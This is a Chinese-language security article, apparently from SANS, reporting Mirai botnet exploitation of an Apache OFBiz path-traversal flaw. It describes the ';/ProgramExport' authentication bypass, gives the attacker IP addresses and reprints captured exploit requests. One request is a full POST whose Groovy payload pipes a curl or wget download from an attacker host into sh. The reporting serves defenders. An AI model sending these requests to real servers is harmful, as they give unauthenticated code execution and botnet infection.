企业资源规划 （ERP） 软件是许多支持人力资源、会计、运输和制造的企业的核心。这些系统可能会变得非常复杂且难以维护。它们通常是高度定制的，这可能会使修补变得困难。但是，关键漏洞会不断影响这些系统，并使关键业务数据面临风险。

SANS Internet Storm Center 发布了一份报告，展示了开源 ERP 框架 OFBiz 目前如何成为 Mirai 僵尸网络新品种的目标。

作为其广泛的项目组合的一部分，Apache基金会支持OFBiz，这是一个基于Java的框架，用于创建ERP（企业资源规划）应用程序。OFBiz 似乎远不如商业替代品普遍。然而，与任何其他ERP系统一样，组织依赖它来存储敏感的业务数据，而这些ERP系统的安全性至关重要。

今年 5 月，OFBiz 发布了一个关键安全更新。此更新修复了一个目录遍历漏洞，该漏洞可能导致远程命令执行。18.12.13 之前的 OFBiz 版本受到影响。几周后，有关该漏洞的详细信息被公开。

目录遍历或路径遍历漏洞可用于绕过访问控制规则。例如，如果用户可以访问“/public”目录，但不能访问“/admin”目录，则攻击者可能会使用类似“/public/../admin“来欺骗访问控制逻辑。最近，CISA 和 FBI 发布了一个警报，作为“安全设计”计划的一部分，重点关注目录遍历。CISA 指出，他们目前正在跟踪 55 个目录遍历漏洞，作为“已知利用漏洞”（KEV） 目录的一部分。

对于 OFBiz，插入分号可以很容易地触发目录遍历。攻击者只需找到一个他们可以访问的 URL，并附加一个分号，后跟一个受限制的 URL。我们目前看到的漏洞利用 URL 是：

/webtools/control/forgotPassword;/ProgramExport

由于用户必须能够在不先登录的情况下重置密码，因此“forgotPassword”不需要任何身份验证。另一方面，“ProgramExport”应该是访问控制的，除非用户登录，否则无法访问。“ProgramExport”特别危险，因为它允许任意代码执行。OFBiz 中的错误逻辑停止评估分号处的 URL。这允许任何用户在不登录的情况下访问 URL 的第二部分“/ProgramExport”。

攻击者必须使用 POST 请求来利用此漏洞，但不一定需要请求正文。相反，URL 参数可以正常工作。

SANS Internet Storm Center 使用广泛的蜜罐网络来检测利用各种 Web 应用程序漏洞的尝试。“首次发现”报告中总结了重要的新漏洞利用尝试。本周末，这些传感器检测到利用 CVE-2024-32213（上述 OFBiz 目录遍历漏洞）的尝试显着增加，该漏洞立即被“First Seen”报告发现。

漏洞利用尝试源自两个不同的 IP 地址，这些 IP 地址也与利用物联网设备的各种尝试相关联，通常与当前种类的“Mirai”僵尸网络相关联。

歹徒使用了两种类型的漏洞利用。第一个使用 URL 来包含漏洞利用打算执行的命令：

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh

第二个使用了命令请求的正文，这在“POST”请求中更为常见：

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);

可悲的是，“bin.sh”和“sh”脚本都没有恢复。7 月 29 日，使用用户代理“KrebsOnSecurity”对 IP 地址进行了扫描，这是对信息安全博主 Brian Krebs 的提示。然而，扫描的URL大多是寄生的，寻找先前攻击留下的现有Web Shell。该 IP 地址还用于分发名为“botx.arm”的文件。此文件名通常与 Mirai 变体相关联。

随着 5 月份的漏洞公告，我们一直在等待一些扫描以利用 OFBiz 漏洞。剥削是微不足道的，虽然脆弱和暴露的人口很少，但这在过去并没有阻止攻击者。但他们现在至少在试验，并可能将漏洞添加到像Mirai变体这样的机器人中。

仅涉及几个 IP：

• 95.214.27.196：将漏洞作为 URL 参数发送并托管恶意软件。
• 83.222.191.62：将漏洞作为请求正文发送。托管在 185.196.10.231 上的恶意软件。7 月初，该 IP 扫描了 IoT 漏洞。
• 185.196.10.231：托管恶意软件

如果您觉得这篇文章很有趣，并想更深入地了解保护 Web 应用程序、API 和微服务的世界，您可以加入我的网络安全 2024（9 月 4 日至 9 日）课程 SEC522。在此处查看活动店内的所有内容。

注意：本文由 SANS 技术研究所研究院长 Johannes Ullrich 博士撰写和贡献。